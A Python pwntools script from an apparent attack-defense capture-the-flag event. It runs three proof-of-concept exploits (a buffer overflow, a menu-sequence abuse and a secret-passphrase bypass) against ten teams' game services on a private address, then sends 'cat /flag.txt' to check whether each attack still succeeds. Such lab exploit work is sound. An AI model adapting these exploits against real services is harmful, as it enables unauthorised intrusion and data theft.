#! /usr/bin/env python2 # from pwn import context, remote from pwn import remote, context from multiprocessing import pool context.log_level = "error" HOST = "192.168.2.20" TOTAL_TEAMS = 10 FORMAT = "SlashRootCTF" def poc0(host, port): with remote(host, port) as p: p.recvuntil(">") p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) msg = p.recvuntil(">") # print(msg) if "young" in msg: p.sendline("y") p.recvuntil(">") p.sendline("2") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") for _ in xrange(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") flag = p.recvuntil("}") # print flag if FORMAT in flag: return True else: return False else: return False def poc1(host, port): with remote(host, port) as p: p.recvuntil(">") p.sendline("Leo") p.recvuntil(">") p.sendline("y") for _ in range(2): p.recvuntil(">") p.sendline("3") p.recvuntil(">") p.sendline("0") if "Who" in p.recvuntil(">"): return False p.sendline("y") p.recvuntil(">") p.sendline("1") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") for _ in range(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") flag = p.recvuntil("}") if FORMAT in flag: return True else: return False def poc2(host, port): with remote(host, port) as p: p.recvuntil(">") p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") p.recvuntil(">") p.sendline("y") p.recvuntil(">") p.sendline("6") if "Lv: 1000000" in p.recvuntil(">"): p.sendline("2") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") for _ in xrange(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") flag = p.recvuntil("}") if FORMAT in flag: return True else: return False else: return False if __name__ == "__main__": for i in range(1, TOTAL_TEAMS+1): r0 = poc0(HOST, (60004 + (i*100))) r1 = poc1(HOST, (60004 + (i*100))) r2 = poc2(HOST, (60004 + (i*100))) print("Team [%s] %s %s %s" % (i, r0, r1, r2))